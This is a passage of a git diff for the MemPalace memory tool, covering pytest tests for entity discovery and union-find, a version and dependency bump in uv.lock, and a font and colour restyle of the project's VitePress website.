+    # One person from each side, no name overlap: both must be kept.
+    assert len(merged["people"]) == 2
+
+
+# ── discover_entities ──────────────────────────────────────────────────
+
+
+def test_discover_entities_falls_back_to_prose_when_no_git(tmp_path):
+    """With neither manifest nor git, names found in prose are still reported."""
+    prose = (
+        "Riley said hello. Riley asked about it. Riley laughed. "
+        "Hey Riley, thanks for the help. Riley pushed the change. "
+        "Riley decided to go."
+    )
+    (tmp_path / "notes.md").write_text(prose)
+    detected = discover_entities(str(tmp_path))
+    # Riley may land in any category, so search all of them.
+    every_name = [item["name"] for bucket in detected.values() for item in bucket]
+    assert "Riley" in every_name
+
+
+def test_discover_entities_prefers_real_signal_over_prose(tmp_path):
+    """The manifest's project name is reported even alongside noisy prose."""
+    noisy_prose = (
+        "Something. Another. Whatever. Context. Context. Context. Context. "
+        "realproj. realproj. realproj. realproj."
+    )
+    (tmp_path / "package.json").write_text(json.dumps({"name": "realproj"}))
+    _init_git_repo(tmp_path)
+    (tmp_path / "doc.md").write_text(noisy_prose)
+    projects = discover_entities(str(tmp_path))["projects"]
+    assert any(entry["name"] == "realproj" for entry in projects)
+
+
+def test_discover_entities_keeps_uncertain_for_llm_when_real_signal(tmp_path):
+    """A prose-only candidate reaches the LLM provider even when a manifest exists."""
+    (tmp_path / "package.json").write_text(json.dumps({"name": "realproj"}))
+    _init_git_repo(tmp_path)
+    (tmp_path / "doc.md").write_text("Noise appeared. Noise repeated. Noise again.")
+    canned_reply = '{"classifications": [{"name": "Noise", "label": "COMMON_WORD"}]}'
+
+    class FakeProvider:
+        """Records each user prompt and always answers with canned_reply."""
+
+        def __init__(self):
+            self.prompts = []
+
+        def classify(self, _system, user, json_mode=True):
+            self.prompts.append(user)
+            return SimpleNamespace(text=canned_reply)
+
+    recorder = FakeProvider()
+    found = discover_entities(str(tmp_path), llm_provider=recorder, show_progress=False)
+    assert len(recorder.prompts) == 1
+    assert "Noise" in recorder.prompts[0]
+    assert "Noise" not in [item["name"] for bucket in found.values() for item in bucket]
+
+
+def test_discover_entities_keeps_llm_only_project_uncertain_when_real_signal(tmp_path):
+    """A name only the LLM labels PROJECT stays in "uncertain" next to a real project."""
+    (tmp_path / "package.json").write_text(json.dumps({"name": "realproj"}))
+    _init_git_repo(tmp_path)
+    (tmp_path / "doc.md").write_text("Terraform shipped. Terraform changed. Terraform runs.")
+    verdict = '{"classifications": [{"name": "Terraform", "label": "PROJECT"}]}'
+
+    class FakeProvider:
+        def classify(self, _system, _user, json_mode=True):
+            return SimpleNamespace(text=verdict)
+
+    found = discover_entities(str(tmp_path), llm_provider=FakeProvider(), show_progress=False)
+    project_names = [entry["name"] for entry in found["projects"]]
+    uncertain_names = [entry["name"] for entry in found["uncertain"]]
+    assert "realproj" in project_names
+    assert "Terraform" not in project_names
+    assert "Terraform" in uncertain_names
+
+
+def test_discover_entities_collapses_case_variants_between_manifest_and_convo(tmp_path):
+    """`myproj` (manifest) and `MyProj` (Claude Code session cwd) must end up
+    as a single project entry, consistent with the case-insensitive dedup
+    used by `_merge_detected` and `miner.add_to_known_entities`."""
+    # The directory name mimics an entry of a Claude Code `.claude/projects/` dir.
+    scan_root = tmp_path / "projects_root"
+    checkout = scan_root / "-home-u-src-myproj"
+    checkout.mkdir(parents=True)
+
+    # Source 1: a git repo whose manifest names the project in lowercase.
+    (checkout / "package.json").write_text(json.dumps({"name": "myproj"}))
+    _init_git_repo(checkout)
+
+    # Source 2: a session log in that same directory. Its `cwd` field is
+    # `/home/u/src/MyProj`, i.e. the CamelCase spelling of the same project,
+    # which the conversation scanner is expected to pick up.
+    session_line = json.dumps({"type": "user", "cwd": "/home/u/src/MyProj"})
+    (checkout / "abc.jsonl").write_text(session_line + "\n")
+
+    detected = discover_entities(str(scan_root))
+
+    names = [entry["name"] for entry in detected["projects"]]
+    # Exactly one entry may remain. Its spelling is only compared ignoring case
+    # (the manifest spelling is expected to win because it is seeded first).
+    assert len(names) == 1
+    assert names[0].lower() == "myproj"
+
+
+# ── _UnionFind basics ──────────────────────────────────────────────────
+
+
+def test_unionfind_find_creates_singleton():
+    """find() on a key never seen before returns the key itself."""
+    assert _UnionFind().find("x") == "x"
+
+
+def test_unionfind_union_merges():
+    forest = _UnionFind()
+    forest.union("a", "b")
+    assert forest.find("a") == forest.find("b")  # one shared representative
+
+
+def test_unionfind_transitive():
+    chain = _UnionFind()
+    for left, right in (("a", "b"), ("b", "c")):
+        chain.union(left, right)
+    assert chain.find("a") == chain.find("c")
diff --git a/uv.lock b/uv.lock
index 49c28ff2c..f102d434f 100644
--- a/uv.lock
+++ b/uv.lock
@@ -1169,11 +1169,12 @@ wheels = [
 
 [[package]]
 name = "mempalace"
-version = "3.3.2"
+version = "3.3.3"
 source = { editable = "." }
 dependencies = [
     { name = "chromadb" },
     { name = "pyyaml" },
+    { name = "tomli", marker = "python_full_version < '3.11'" },
 ]
 
 [package.optional-dependencies]
@@ -1206,6 +1207,7 @@ requires-dist = [
     { name = "pytest-cov", marker = "extra == 'dev'", specifier = ">=4.0" },
     { name = "pyyaml", specifier = ">=6.0,<7" },
     { name = "ruff", marker = "extra == 'dev'", specifier = ">=0.4.0" },
+    { name = "tomli", marker = "python_full_version < '3.11'", specifier = ">=2.0.0" },
 ]
 provides-extras = ["dev", "spellcheck"]
 
diff --git a/website/.vitepress/config.mts b/website/.vitepress/config.mts
index 49cf97522..47b69e25e 100644
--- a/website/.vitepress/config.mts
+++ b/website/.vitepress/config.mts
@@ -21,9 +21,11 @@ export default withMermaid(
 
     head: [
       ['link', { rel: 'icon', href: `${docsBase}mempalace_logo.png` }],
+      ['link', { rel: 'preconnect', href: 'https://api.fontshare.com' }],
+      ['link', { href: 'https://api.fontshare.com/v2/css?f[]=neue-machina@300,400,500,700,800&f[]=satoshi@300,400,500,700&display=swap', rel: 'stylesheet' }],
       ['link', { rel: 'preconnect', href: 'https://fonts.googleapis.com' }],
       ['link', { rel: 'preconnect', href: 'https://fonts.gstatic.com', crossorigin: '' }],
-      ['link', { href: 'https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700&family=JetBrains+Mono:wght@300;400;500&family=Cormorant+Garamond:ital,wght@0,300;0,400;0,500;0,600;0,700;1,300;1,400&family=Geist:wght@300;400;500;600&display=swap', rel: 'stylesheet' }],
+      ['link', { href: 'https://fonts.googleapis.com/css2?family=Onest:wght@300;400;500;600&family=JetBrains+Mono:wght@400;500&display=swap', rel: 'stylesheet' }],
       ['meta', { property: 'og:title', content: 'MemPalace — AI Memory System' }],
       ['meta', { property: 'og:description', content: '96.6% LongMemEval recall. Zero API calls. Local, free, open source.' }],
       ['meta', { property: 'og:image', content: `${docsBase}mempalace_logo.png` }],
diff --git a/website/.vitepress/theme/landing/HeroSection.vue b/website/.vitepress/theme/landing/HeroSection.vue
index 279e80da4..bca5f18ef 100644
--- a/website/.vitepress/theme/landing/HeroSection.vue
+++ b/website/.vitepress/theme/landing/HeroSection.vue
@@ -5,13 +5,12 @@
     <div class="hero-inner">
       <div class="hero-copy">
         <h1 class="display">
-          <span class="line">Memory is</span>
-          <span class="line line-2">identity.</span>
+          <span class="line">Memory <em class="is-accent">is</em></span>
+          <span class="line line-2"><span class="identity-white">identity.</span></span>
         </h1>
         <p class="lede">
-          An AI that forgets cannot know you. MemPalace keeps every word you have
-          shared — verbatim, on your machine, permanent. Designed for total
-          recall.
+          Every conversation, every idea, every small decision&hellip; held somewhere safe.
+          <br><br>Welcome to the future of memory: <span class="mp-blue">MemPalace</span>
         </p>
         <form class="waitlist waitlist-hero" data-source="hero" novalidate>
           <div class="waitlist-head">
diff --git a/website/.vitepress/theme/landing/landing.css b/website/.vitepress/theme/landing/landing.css
index 908ac8c82..313f906d5 100644
--- a/website/.vitepress/theme/landing/landing.css
+++ b/website/.vitepress/theme/landing/landing.css
@@ -24,23 +24,23 @@ body.mempalace-active .VPDoc {
 body.mempalace-active { overflow-x: hidden; }
 
 .mempalace-landing {
-  --void:        #05070A;
-  --obsidian:    #0A0D12;
-  --obsidian-2:  #11151C;
-  --ink:         #181D26;
-  --hair:        rgba(158, 216, 255, 0.14);
-  --hair-strong: rgba(158, 216, 255, 0.28);
-  --ice:         #EAF4FF;
-  --ice-dim:     #b8c7d9;
-  --ice-ghost:   rgba(234, 244, 255, 0.56);
-  --prism:       #9ED8FF;
-  --prism-core:  #4AA3FF;
-  --refract:     #A8B5FF;
-  --stellar:     #F3E7B0;
-  --ember:       #E28A6B;
+  --void:        #080C18;
+  --obsidian:    #0F1524;
+  --obsidian-2:  #182033;
+  --ink:         #1C2640;
+  --hair:        rgba(56, 189, 248, 0.14);
+  --hair-strong: rgba(56, 189, 248, 0.28);
+  --ice:         #DBE7F5;
+  --ice-dim:     #8B99B0;
+  --ice-ghost:   rgba(219, 231, 245, 0.56);
+  --prism:       #7DD3FC;
+  --prism-core:  #38BDF8;
+  --refract:     #A78BFA;
+  --stellar:     #FBBF24;
+  --ember:       #FF8B8B;
 
-  --f-display: "Cormorant Garamond", "Times New Roman", serif;
-  --f-body:    "Geist", ui-sans-serif, system-ui, sans-serif;
+  --f-display: "Neue Machina", "Satoshi", sans-serif;
+  --f-body:    "Onest", ui-sans-serif, system-ui, sans-serif;
   --f-mono:    "JetBrains Mono", ui-monospace, monospace;
 
   --measure: 68ch;
@@ -50,7 +50,7 @@ body.mempalace-active { overflow-x: hidden; }
   background: var(--void);
   color: var(--ice);
   font-family: var(--f-body);
-  font-weight: 300;
+  font-weight: 400;
   font-size: 16px;
   line-height: 1.6;
   -webkit-font-smoothing: antialiased;
@@ -60,16 +60,16 @@ body.mempalace-active { overflow-x: hidden; }
   position: relative;
 }
 .mempalace-landing * { box-sizing: border-box; }
-.mempalace-landing ::selection { background: var(--prism-core); color: var(--void); }
+.mempalace-landing ::selection { background: var(--prism-core); color: #080C18; }
 
 .mempalace-landing::before {
   content: "";
   position: fixed; inset: 0;
   pointer-events: none;
   background:
-    radial-gradient(80% 60% at 50% -10%, rgba(74,163,255,0.18), transparent 60%),
-    radial-gradient(40% 40% at 85% 20%, rgba(168,181,255,0.08), transparent 70%),
-    radial-gradient(50% 50% at 15% 80%, rgba(158,216,255,0.06), transparent 70%);
+    radial-gradient(80% 60% at 50% -10%, rgba(56,189,248,0.18), transparent 60%),
+    radial-gradient(40% 40% at 85% 20%, rgba(167,139,250,0.08), transparent 70%),
+    radial-gradient(50% 50% at 15% 80%, rgba(125,211,252,0.06), transparent 70%);
   z-index: 0;
 }
 .mempalace-landing::after {
@@ -153,7 +153,7 @@ body.mempalace-active { overflow-x: hidden; }
   line-height: 0.95;
   color: var(--ice);
 }
-.mempalace-landing .display em { font-style: italic; color: var(--prism); }
+.mempalace-landing .display em { font-style: italic; color: var(--prism-core); }
 .mempalace-landing .lede {
   font-family: var(--f-display);
   /* font-style: italic; */
@@ -237,8 +237,11 @@ body.mempalace-active { overflow-x: hidden; }
   margin: 0 0 1.25rem;
 }
 .mempalace-landing .hero h1 .line { display: block; }
-.mempalace-landing .hero h1 .line-2 { font-style: italic; color: var(--prism); font-weight: 300; }
+.mempalace-landing .hero h1 .line-2 { font-style: normal; font-weight: 400; }
+.mempalace-landing .hero h1 .is-accent { font-style: italic; color: var(--prism-core); font-weight: 300; }
+.mempalace-landing .hero h1 .identity-white { color: #ffffff; }
 .mempalace-landing .hero .lede { margin-bottom: 0; }
+.mempalace-landing .hero .lede .mp-blue { color: var(--prism-core); font-weight: 500; }
 .mempalace-landing .hero-cta {
   display: flex;
   flex-wrap: wrap;
diff --git a/website/.vitepress/theme/style.css b/website/.vitepress/theme/style.css
index 4aacc70a2..0d231901e 100644
--- a/website/.vitepress/theme/style.css
+++ b/website/.vitepress/theme/style.css
@@ -1,67 +1,73 @@
 /* ── MemPalace Custom Theme ──────────────────────────────────────────── */
-/* Deep indigo / cyan palette — evoking architectural grandeur          */
+/* Crystal Lattice palette — crystalline cyan through deep blue-black    */
 
 :root {
-  /* Brand palette */
-  --mp-indigo: #4f46e5;
-  --mp-indigo-light: #6366f1;
-  --mp-indigo-dark: #3730a3;
-  --mp-cyan: #06b6d4;
-  --mp-cyan-light: #22d3ee;
-  --mp-purple: #8b5cf6;
-  --mp-purple-light: #a78bfa;
-  --mp-emerald: #10b981;
-  --mp-amber: #f59e0b;
+  /* Crystal Lattice palette */
+  --mp-bg: #080C18;
+  --mp-surface: #0F1524;
+  --mp-surface-high: #182033;
+  --mp-border: #1C2640;
+  --mp-border-soft: #121829;
+  --mp-cyan: #7DD3FC;
+  --mp-cyan-vivid: #38BDF8;
+  --mp-ice: #DBE7F5;
+  --mp-body: #CDD5E0;
+  --mp-muted: #8B99B0;
+  --mp-dim: #5B6B82;
+  --mp-ok: #34D399;
+  --mp-warn: #FBBF24;
+  --mp-hot: #FF8B8B;
+  --mp-violet: #A78BFA;
 
   /* VitePress overrides */
-  --vp-c-brand-1: var(--mp-indigo);
-  --vp-c-brand-2: var(--mp-indigo-light);
-  --vp-c-brand-3: var(--mp-purple);
-  --vp-c-brand-soft: rgba(79, 70, 229, 0.14);
+  --vp-c-brand-1: var(--mp-cyan-vivid);
+  --vp-c-brand-2: var(--mp-cyan);
+  --vp-c-brand-3: var(--mp-violet);
+  --vp-c-brand-soft: rgba(56, 189, 248, 0.14);
 
-  --vp-font-family-base: 'Inter', -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif;
-  --vp-font-family-mono: 'JetBrains Mono', 'Fira Code', monospace;
+  --vp-font-family-base: 'Onest', -apple-system, BlinkMacSystemFont, 'Segoe UI', sans-serif;
+  --vp-font-family-mono: 'JetBrains Mono', monospace;
 
   /* Home hero gradient */
   --vp-home-hero-name-color: transparent;
-  --vp-home-hero-name-background: linear-gradient(135deg, var(--mp-indigo) 0%, var(--mp-cyan) 50%, var(--mp-purple) 100%);
-  --vp-home-hero-image-background-image: linear-gradient(135deg, rgba(79, 70, 229, 0.25) 0%, rgba(6, 182, 212, 0.25) 50%, rgba(139, 92, 246, 0.15) 100%);
+  --vp-home-hero-name-background: linear-gradient(135deg, var(--mp-ice) 0%, var(--mp-cyan-vivid) 60%, var(--mp-violet) 100%);
+  --vp-home-hero-image-background-image: linear-gradient(135deg, rgba(56, 189, 248, 0.25) 0%, rgba(125, 211, 252, 0.2) 50%, rgba(167, 139, 250, 0.15) 100%);
   --vp-home-hero-image-filter: blur(56px);
 
   /* Button colors */
   --vp-button-brand-border: transparent;
-  --vp-button-brand-text: #ffffff;
-  --vp-button-brand-bg: var(--mp-indigo);
+  --vp-button-brand-text: #080C18;
+  --vp-button-brand-bg: var(--mp-cyan-vivid);
   --vp-button-brand-hover-border: transparent;
-  --vp-button-brand-hover-text: #ffffff;
-  --vp-button-brand-hover-bg: var(--mp-indigo-light);
+  --vp-button-brand-hover-text: #080C18;
+  --vp-button-brand-hover-bg: var(--mp-cyan);
 
-  --vp-button-alt-border: rgba(79, 70, 229, 0.25);
-  --vp-button-alt-text: var(--mp-indigo);
-  --vp-button-alt-bg: rgba(79, 70, 229, 0.08);
-  --vp-button-alt-hover-border: rgba(79, 70, 229, 0.4);
-  --vp-button-alt-hover-text: var(--mp-indigo-dark);
-  --vp-button-alt-hover-bg: rgba(79, 70, 229, 0.14);
+  --vp-button-alt-border: rgba(56, 189, 248, 0.25);
+  --vp-button-alt-text: var(--mp-cyan-vivid);
+  --vp-button-alt-bg: rgba(56, 189, 248, 0.08);
+  --vp-button-alt-hover-border: rgba(56, 189, 248, 0.4);
+  --vp-button-alt-hover-text: var(--mp-cyan);
+  --vp-button-alt-hover-bg: rgba(56, 189, 248, 0.14);
 }
 
 /* Dark mode overrides */
 .dark {
-  --vp-c-brand-1: var(--mp-cyan-light);
+  --vp-c-brand-1: var(--mp-cyan-vivid);
   --vp-c-brand-2: var(--mp-cyan);
-  --vp-c-brand-3: var(--mp-purple-light);
-  --vp-c-brand-soft: rgba(6, 182, 212, 0.14);
+  --vp-c-brand-3: var(--mp-violet);
+  --vp-c-brand-soft: rgba(56, 189, 248, 0.14);
 
-  --vp-button-brand-bg: var(--mp-indigo-light);
-  --vp-button-brand-hover-bg: var(--mp-indigo);
+  --vp-button-brand-bg: var(--mp-cyan-vivid);
+  --vp-button-brand-hover-bg: var(--mp-cyan);
 
-  --vp-button-alt-border: rgba(34, 211, 238, 0.25);
-  --vp-button-alt-text: var(--mp-cyan-light);
-  --vp-button-alt-bg: rgba(34, 211, 238, 0.08);
-  --vp-button-alt-hover-border: rgba(34, 211, 238, 0.4);
+  --vp-button-alt-border: rgba(56, 189, 248, 0.25);
+  --vp-button-alt-text: var(--mp-cyan-vivid);
+  --vp-button-alt-bg: rgba(56, 189, 248, 0.08);
+  --vp-button-alt-hover-border: rgba(56, 189, 248, 0.4);
   --vp-button-alt-hover-text: var(--mp-cyan);
-  --vp-button-alt-hover-bg: rgba(34, 211, 238, 0.14);
+  --vp-button-alt-hover-bg: rgba(56, 189, 248, 0.14);
 
-  --vp-home-hero-image-background-image: linear-gradient(135deg, rgba(99, 102, 241, 0.3) 0%, rgba(6, 182, 212, 0.3) 50%, rgba(139, 92, 246, 0.2) 100%);
+  --vp-home-hero-image-background-image: linear-gradient(135deg, rgba(56, 189, 248, 0.3) 0%, rgba(125, 211, 252, 0.2) 50%, rgba(167, 139, 250, 0.15) 100%);
 }
 
 /* ── Hero section ───────────────────────────────────────────────────── */
@@ -72,19 +78,22 @@
 }
 
 .VPHero .name {
-  font-weight: 700 !important;
+  font-family: 'Neue Machina', 'Satoshi', sans-serif !important;
+  font-weight: 500 !important;
+  letter-spacing: -1.5px;
 }
 
 .VPHero .text {
+  font-family: 'Satoshi', 'Onest', sans-serif;
   font-weight: 500;
-  background: linear-gradient(135deg, var(--vp-c-text-1) 0%, var(--mp-indigo-light) 100%);
+  background: linear-gradient(135deg, var(--vp-c-text-1) 0%, var(--mp-cyan-vivid) 100%);
   -webkit-background-clip: text;
   -webkit-text-fill-color: transparent;
   background-clip: text;
 }
 
 .dark .VPHero .text {
-  background: linear-gradient(135deg, var(--vp-c-text-1) 0%, var(--mp-cyan-light) 100%);
+  background: linear-gradient(135deg, var(--mp-ice) 0%, var(--mp-cyan-vivid) 100%);
   -webkit-background-clip: text;
   -webkit-text-fill-color: transparent;
   background-clip: text;
@@ -99,16 +108,17 @@
 
 .VPFeature:hover {
   transform: translateY(-4px);
-  border-color: var(--mp-indigo);
-  box-shadow: 0 12px 40px rgba(79, 70, 229, 0.12);
+  border-color: var(--mp-cyan-vivid);
+  box-shadow: 0 12px 40px rgba(56, 189, 248, 0.12);
 }
 
 .dark .VPFeature:hover {
-  border-color: var(--mp-cyan);
-  box-shadow: 0 12px 40px rgba(6, 182, 212, 0.12);
+  border-color: var(--mp-cyan-vivid);
+  box-shadow: 0 12px 40px rgba(56, 189, 248, 0.12);
 }
 
 .VPFeature .title {
+  font-family: 'Satoshi', 'Onest', sans-serif;
   font-weight: 600;
 }
 
@@ -119,12 +129,12 @@
 }
 
 .VPSidebar .VPSidebarItem.is-active .text {
-  color: var(--mp-indigo) !important;
+  color: var(--mp-cyan-vivid) !important;
   font-weight: 600;
 }
 
 .dark .VPSidebar .VPSidebarItem.is-active .text {
-  color: var(--mp-cyan-light) !important;
+  color: var(--mp-cyan-vivid) !important;
 }
 
 /* ── Code blocks ────────────────────────────────────────────────────── */
@@ -135,21 +145,21 @@
 }
 
 .dark .vp-doc div[class*='language-'] {
-  border-color: rgba(6, 182, 212, 0.15);
+  border-color: rgba(56, 189, 248, 0.15);
 }
 
 /* ── Custom containers ──────────────────────────────────────────────── */
 
 .vp-doc .custom-block.tip {
-  border-color: var(--mp-cyan);
+  border-color: var(--mp-ok);
 }
 
 .vp-doc .custom-block.warning {
-  border-color: var(--mp-amber);
+  border-color: var(--mp-warn);
 }
 
 .vp-doc .custom-block.info {
-  border-color: var(--mp-indigo);
+  border-color: var(--mp-cyan-vivid);
 }
 
 /* ── Tables ─────────────────────────────────────────────────────────── */
@@ -160,19 +170,20 @@
 }
 
 .vp-doc th {
-  background: rgba(79, 70, 229, 0.06);
+  background: rgba(56, 189, 248, 0.06);
   font-weight: 600;
 }
 
 .dark .vp-doc th {
-  background: rgba(6, 182, 212, 0.08);
+  background: rgba(56, 189, 248, 0.08);
 }
 
 /* ── Nav ────────────────────────────────────────────────────────────── */
 
 .VPNavBar .VPNavBarTitle .title {
-  font-weight: 700;
-  letter-spacing: -0.01em;
+  font-family: 'Neue Machina', 'Satoshi', sans-serif;
+  font-weight: 500;
+  letter-spacing: -0.4px;
 }
 
 /* ── Footer ─────────────────────────────────────────────────────────── */
@@ -193,11 +204,11 @@
 }
 
 ::-webkit-scrollbar-thumb:hover {
-  background: var(--mp-indigo);
+  background: var(--mp-cyan-vivid);
 }
 
 .dark ::-webkit-scrollbar-thumb:hover {
-  background: var(--mp-cyan);
+  background: var(--mp-cyan-vivid);
 }
 
 /* ── Smooth transitions ─────────────────────────────────────────────── */